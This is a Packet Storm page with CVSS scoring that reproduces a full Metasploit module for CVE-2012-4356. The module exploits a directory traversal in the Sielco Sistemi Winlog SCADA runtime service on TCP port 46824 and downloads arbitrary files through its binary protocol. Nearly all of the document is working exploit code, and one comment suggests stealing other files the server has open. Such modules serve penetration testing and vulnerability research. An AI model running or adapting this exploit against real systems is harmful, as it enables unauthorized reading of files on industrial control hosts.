packetstormLuigi Auriemma, juan vazquez, metasploit.comPACKETSTORM:180950

Sielco Sistemi Winlog Remote File Access

2024-08-31 00:00:00
Luigi Auriemma, juan vazquez, metasploit.com
packetstormsecurity.com
11
metasploit
directory traversal
vulnerability
sielco sistemi winlog
port 46824
remote file access

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

AI Score

7

Confidence

Low

EPSS

0.036

Percentile

91.8%

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Module metadata (name, description, authors, references) and the
  # operator-facing options: RPORT (default 46824), FILEPATH (file to
  # retrieve) and DEPTH (number of "../" segments prepended to it).
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Sielco Sistemi Winlog Remote File Access',
      'Description' => %q{
        This module exploits a directory traversal in Sielco Sistemi Winlog. The vulnerability
        exists in the Runtime.exe service and can be triggered by sending a specially crafted packet
        to the 46824/TCP port. This module has been successfully tested on Sielco Sistemi Winlog Lite
        2.07.14.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Luigi Auriemma', # Vulnerability Discovery and PoC
          'juan vazquez' # Metasploit module
        ],
      'References' =>
        [
          [ 'CVE', '2012-4356' ],
          [ 'OSVDB', '83275' ],
          [ 'BID', '54212' ],
          [ 'EDB', '19409'],
          [ 'URL', 'http://aluigi.altervista.org/adv/winlog_2-adv.txt' ]
        ]
    ))

    register_options(
      [
        Opt::RPORT(46824),
        OptString.new('FILEPATH', [true, 'The name of the file to download', '/WINDOWS/system32/drivers/etc/hosts']),
        OptInt.new('DEPTH', [true, 'Traversal depth', 10])
      ])
  end

  # Per-host scanner entry point. Performs a four-message exchange with the
  # Winlog runtime service on RPORT -- open (opcode 0x78), get size (0x79),
  # read (0x98, repeated) and close (0x7B) -- and stores the returned bytes
  # as loot. Every reply is validated only by its first byte, which is
  # expected to echo the request opcode.
  #
  # Wire format visible below: each request is 20 zero bytes, one opcode
  # byte, then the payload. The size, read and close requests are 32 bytes
  # in total; the open request carries the traversal path followed by a NUL
  # terminator. The fixed 20-byte zero prefix, the opcode byte and the
  # "../" run in the open request are the traits a network detection for
  # this traffic would key on.
  #
  # @param ip [String] target host handed in by the scanner mixin
  # @return [void]
  def run_host(ip)
    # No point to continue if no filename is specified
    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
      print_error("#{ip}:#{rport} - Please supply the name of the file you want to download")
      return
    end

    # Build the traversal path: DEPTH copies of "../" followed by FILEPATH,
    # with a single leading "/" on FILEPATH dropped so the two join cleanly.
    travs = "../" * datastore['DEPTH']
    if datastore['FILEPATH'][0] == "/"
      travs << datastore['FILEPATH'][1, datastore['FILEPATH'].length]
    else
      travs << datastore['FILEPATH']
    end

    connect

    # Open File through _TCPIPS_BinOpenFileFP
    packet = "\x00" * 20
    packet << "\x78" # Opcode
    packet << travs # Path traversal
    packet << "\x00"
    sock.put(packet)
    # Up to 5 bytes: opcode echo + 4-byte stream id. An empty reply makes
    # unpack("C").first nil, which fails the check below like any bad opcode.
    response = sock.get_once(5, 1) || ''

    if response.unpack("C").first != 0x78
      print_error "#{ip}:#{rport} - Error opening file"
      return
    end
    # The stream allows to identify our file since the
    # server could be handling multiple files simultaneously.
    # Since the stream identifier is just an offset in an array
    # of opened streams it could be used to guess other files
    # opened by the server and stole them :-) just an idea....
    stream = response[1, 4]

    # Get File Length through _TCPIPS_BinGetFileSizeFP
    packet = "\x00" * 20
    packet << "\x79" # Opcode
    packet << stream # stream
    packet << "\x00" * 7
    sock.put(packet)
    response = sock.get_once(5, 1) || ''

    if response.unpack("C").first != 0x79
      print_error "#{ip}:#{rport} - Error getting the file length"
      return
    end
    # Bytes 1..4 of the reply: file size as a 32-bit little-endian integer.
    file_length = response[1,4].unpack("V").first


    # Read File with the help of _TCPIPS_BinGetStringRecordFP
    # Loop until the accumulated contents reach the reported size. A
    # reported size of 0 skips the loop entirely.
    contents = ""
    offset = 0
    while contents.length < file_length
      packet = "\x00" * 20
      packet << "\x98" # Opcode
      packet << [offset].pack("V") # offset (blocks of 0x55)
      packet << stream # stream
      packet << "\x00" * 3
      sock.put(packet)
      response = ""

      # Each read reply is expected to be exactly 0x7ac bytes: a 9-byte
      # header followed by 0x7a3 bytes of data. Keep reading until that
      # size is reached.
      # NOTE(review): `<<` binds tighter than `||` on the next line, so the
      # `|| ''` fallback never applies to a nil from get_once; a nil would
      # raise TypeError in `<<` instead of being appended as ''.
      while response.length < 0x7ac # Packets of 0x7ac (header (0x9) + block of data (0x7a3))
        response << sock.get_once(0x7ac-response.length, 5) || ''
      end
      # A bad opcode here is reported but not fatal; the loop continues.
      if response.unpack("C").first != 0x98
        print_error "#{ip}:#{rport} - Error reading the file, anyway we're going to try to finish"
      end

      # Skip the 9-byte header. On the final reply take only the bytes still
      # missing so contents never exceeds file_length; otherwise take all of
      # the data part.
      if (file_length - contents.length) < response.length - 9
        contents << response[9, file_length - contents.length] # last packet
      else
        contents << response[9, response.length] # no last packet
      end

      # The offset is counted in 0x55-byte blocks; 0x17 (23) blocks of 0x55
      # bytes equal 0x7a3, the data part of one reply.
      offset = offset + 0x17 # 17 blocks in every packet
    end

    # Close File through _TCPIPS_BinCloseFileFP
    # Opcode 0x7B with an all-zero 11-byte payload. A bad reply is reported
    # but does not abort, since the contents are already in hand.
    packet = "\x00" * 20
    packet << "\x7B"
    packet << "\x00" * 11
    sock.put(packet)
    response = sock.get_once(-1, 1) || ''
    if response.unpack("C").first != 0x7B
      print_error "#{ip}:#{rport} - Error closing file file, anyway we're going to try to finish"
    end

    disconnect

    print_good "#{ip}:#{rport} - File retrieved successfully!"

    # Persist the retrieved bytes via the Report mixin, named after the
    # requested file's basename and tagged with the full FILEPATH.
    fname = File.basename(datastore['FILEPATH'])
    path = store_loot(
      'sielcosistemi.winlog',
      'application/octet-stream',
      ip,
      contents,
      fname,
      datastore['FILEPATH']
    )
    print_status("#{ip}:#{rport} - File saved in: #{path}")

  end
end
`
